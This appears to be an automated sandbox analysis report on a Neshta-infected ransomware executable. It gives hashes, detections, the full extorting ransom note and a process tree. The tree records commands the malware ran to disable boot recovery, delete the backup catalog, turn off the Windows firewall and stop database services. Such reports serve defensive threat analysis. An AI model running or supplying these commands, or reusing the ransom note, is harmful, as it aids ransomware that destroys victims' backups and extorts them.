Analysis

  • max time kernel
    175s
  • max time network
    187s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-en-20220113
  • submitted
    12-02-2022 00:25

General

  • Target

    a76599e3fc1c23140ac11b4335416c3bc29b6d9a9c028ed845433dd47f18a2e9.exe

  • Size

    1.3MB

  • MD5

    08676a0eaff0dc145df83c6e8da85920

  • SHA1

    729bfe1fcc9a31ee58ca56b7cc702b035838cb76

  • SHA256

    a76599e3fc1c23140ac11b4335416c3bc29b6d9a9c028ed845433dd47f18a2e9

  • SHA512

    f80c3723a881de1317dfffabed8e07886651d8e6aa46b622562a4e726924bf7809e2101ed40e2316339067608febb6a2cf49a116a0cca791d9aea3afcf3e553e

Malware Config

Extracted

Path

C:\Read-this.txt

Ransom Note
All Your Files Has Been Encrypted You Have to Pay to Get Your Files Back 1-Go to C:\ProgramData\ or in Your other Drives and send us prvkey.txt.key file 2-You can send some file little than 1mb for Decryption test to trust us But the test File should not contain valuable data 3-Payment should be with Bitcoin 4-Changing Windows without saving prvkey.txt.key file will cause permanete Data loss Our Email:[email protected] in Case of no Answer:[email protected]
Emails

Email:[email protected]

Answer:[email protected]

Signatures

  • Detect Neshta Payload 1 IoCs
  • Modifies system executable filetype association 2 TTPs 1 IoCs
  • Neshta

    Malware from the neshta family is designed to infect itself into other files to spread itself and cause damage.

  • Executes dropped EXE 1 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Drops desktop.ini file(s) 5 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 7 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies registry class 1 IoCs
  • NTFS ADS 5 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 18 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\a76599e3fc1c23140ac11b4335416c3bc29b6d9a9c028ed845433dd47f18a2e9.exe
    "C:\Users\Admin\AppData\Local\Temp\a76599e3fc1c23140ac11b4335416c3bc29b6d9a9c028ed845433dd47f18a2e9.exe"
    1⤵
    • Modifies system executable filetype association
    • Checks computer location settings
    • Drops file in Windows directory
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:1948
    • C:\Users\Admin\AppData\Local\Temp\3582-490\a76599e3fc1c23140ac11b4335416c3bc29b6d9a9c028ed845433dd47f18a2e9.exe
      "C:\Users\Admin\AppData\Local\Temp\3582-490\a76599e3fc1c23140ac11b4335416c3bc29b6d9a9c028ed845433dd47f18a2e9.exe"
      2⤵
      • Executes dropped EXE
      • Drops desktop.ini file(s)
      • Drops file in Program Files directory
      • NTFS ADS
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:4960
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c net stop MSDTC
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4292
        • C:\Windows\SysWOW64\net.exe
          net stop MSDTC
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4288
          • C:\Windows\SysWOW64\net1.exe
            C:\Windows\system32\net1 stop MSDTC
            5⤵
              PID:1312
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures
          3⤵
            PID:1552
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c bcdedit /set {default} recoveryenabled no
            3⤵
              PID:1880
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c wbadmin delete catalog -quiet
              3⤵
                PID:2436
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c net stop SQLSERVERAGENT
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:3168
                • C:\Windows\SysWOW64\net.exe
                  net stop SQLSERVERAGENT
                  4⤵
                  • Suspicious use of WriteProcessMemory
                  PID:864
                  • C:\Windows\SysWOW64\net1.exe
                    C:\Windows\system32\net1 stop SQLSERVERAGENT
                    5⤵
                      PID:2704
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c net stop MSSQLSERVER
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:5092
                  • C:\Windows\SysWOW64\net.exe
                    net stop MSSQLSERVER
                    4⤵
                    • Suspicious use of WriteProcessMemory
                    PID:4080
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 stop MSSQLSERVER
                      5⤵
                        PID:3440
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c net stop vds
                    3⤵
                    • Suspicious use of WriteProcessMemory
                    PID:4408
                    • C:\Windows\SysWOW64\net.exe
                      net stop vds
                      4⤵
                      • Suspicious use of WriteProcessMemory
                      PID:4068
                      • C:\Windows\SysWOW64\net1.exe
                        C:\Windows\system32\net1 stop vds
                        5⤵
                          PID:4260
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c netsh advfirewall set currentprofile state off
                      3⤵
                      • Suspicious use of WriteProcessMemory
                      PID:4828
                      • C:\Windows\SysWOW64\netsh.exe
                        netsh advfirewall set currentprofile state off
                        4⤵
                          PID:3380
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c netsh firewall set opmode mode=disable
                        3⤵
                        • Suspicious use of WriteProcessMemory
                        PID:1040
                        • C:\Windows\SysWOW64\netsh.exe
                          netsh firewall set opmode mode=disable
                          4⤵
                            PID:1884
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /c net stop SQLWriter
                          3⤵
                          • Suspicious use of WriteProcessMemory
                          PID:3460
                          • C:\Windows\SysWOW64\net.exe
                            net stop SQLWriter
                            4⤵
                              PID:4508
                              • C:\Windows\SysWOW64\net1.exe
                                C:\Windows\system32\net1 stop SQLWriter
                                5⤵
                                  PID:1272
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /c net stop SQLBrowser
                              3⤵
                                PID:3924
                                • C:\Windows\SysWOW64\net.exe
                                  net stop SQLBrowser
                                  4⤵
                                    PID:5072
                                    • C:\Windows\SysWOW64\net1.exe
                                      C:\Windows\system32\net1 stop SQLBrowser
                                      5⤵
                                        PID:4460
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /c net stop MSSQLSERVER
                                    3⤵
                                      PID:3180
                                      • C:\Windows\SysWOW64\net.exe
                                        net stop MSSQLSERVER
                                        4⤵
                                          PID:2360
                                          • C:\Windows\SysWOW64\net1.exe
                                            C:\Windows\system32\net1 stop MSSQLSERVER
                                            5⤵
                                              PID:2740
                                        • C:\Windows\SysWOW64\cmd.exe
                                          C:\Windows\system32\cmd.exe /c net stop MSSQL$CONTOSO1
                                          3⤵
                                            PID:3464
                                            • C:\Windows\SysWOW64\net.exe
                                              net stop MSSQL$CONTOSO1
                                              4⤵
                                                PID:3552
                                                • C:\Windows\SysWOW64\net1.exe
                                                  C:\Windows\system32\net1 stop MSSQL$CONTOSO1
                                                  5⤵
                                                    PID:4924
                                          • C:\Windows\system32\svchost.exe
                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
                                            1⤵
                                            • Drops file in Windows directory
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:3732

                                          Network

                                          MITRE ATT&CK Enterprise v6

                                          Replay Monitor

                                          Loading Replay Monitor...

                                          Downloads

                                          • C:\PROGRA~3\MICROS~1\Windows\STARTM~1\Programs\StartUp\A76599~1.EXE
                                            MD5

                                            08676a0eaff0dc145df83c6e8da85920

                                            SHA1

                                            729bfe1fcc9a31ee58ca56b7cc702b035838cb76

                                            SHA256

                                            a76599e3fc1c23140ac11b4335416c3bc29b6d9a9c028ed845433dd47f18a2e9

                                            SHA512

                                            f80c3723a881de1317dfffabed8e07886651d8e6aa46b622562a4e726924bf7809e2101ed40e2316339067608febb6a2cf49a116a0cca791d9aea3afcf3e553e

                                          • C:\Users\Admin\AppData\Local\Temp\3582-490\a76599e3fc1c23140ac11b4335416c3bc29b6d9a9c028ed845433dd47f18a2e9.exe
                                            MD5

                                            b2632c9ded83883e3bd25a86d2ab2ac3

                                            SHA1

                                            c1b49a2dd32e215b605ea41583d4ebc9b59d11aa

                                            SHA256

                                            b627bb5f0ba69fd52bcf71c4c4d1977d43657bd257d5e583d15a56ec1dd942c1

                                            SHA512

                                            04bb2a6937ad6cc6de6d40ef60c2950e7b3b10fe08fed6eea2d2fc97fd96b6a59187aa802c45209566546afd7cb49baf006a8275f4022848d710038ff4e05d43

                                          • C:\Users\Admin\AppData\Local\Temp\3582-490\a76599e3fc1c23140ac11b4335416c3bc29b6d9a9c028ed845433dd47f18a2e9.exe
                                            MD5

                                            b2632c9ded83883e3bd25a86d2ab2ac3

                                            SHA1

                                            c1b49a2dd32e215b605ea41583d4ebc9b59d11aa

                                            SHA256

                                            b627bb5f0ba69fd52bcf71c4c4d1977d43657bd257d5e583d15a56ec1dd942c1

                                            SHA512

                                            04bb2a6937ad6cc6de6d40ef60c2950e7b3b10fe08fed6eea2d2fc97fd96b6a59187aa802c45209566546afd7cb49baf006a8275f4022848d710038ff4e05d43

                                          • C:\odt\office2016setup.exe
                                            MD5

                                            b43488bb0d0ce18aa996cd08ca051f09

                                            SHA1

                                            6b098bdec85b268f6237e47e3074c2632048b99c

                                            SHA256

                                            dc621c473864955e182fa8cb8b54fc443355c0925a5dd1a36c6c60ade4b9e695

                                            SHA512

                                            9835797567ffc5d48d57cf30ebd2215d97de54094f9894af6139d105e2d54d55e40646cd8a62f3dd678ad9395fdd0bf1f8a2c38451ea677fa5bcb65831f636fc

                                          • memory/3732-133-0x000002DDE5730000-0x000002DDE5740000-memory.dmp
                                            Filesize

                                            64KB

                                          • memory/3732-134-0x000002DDE5790000-0x000002DDE57A0000-memory.dmp
                                            Filesize

                                            64KB

                                          • memory/3732-135-0x000002DDE8490000-0x000002DDE8494000-memory.dmp
                                            Filesize

                                            16KB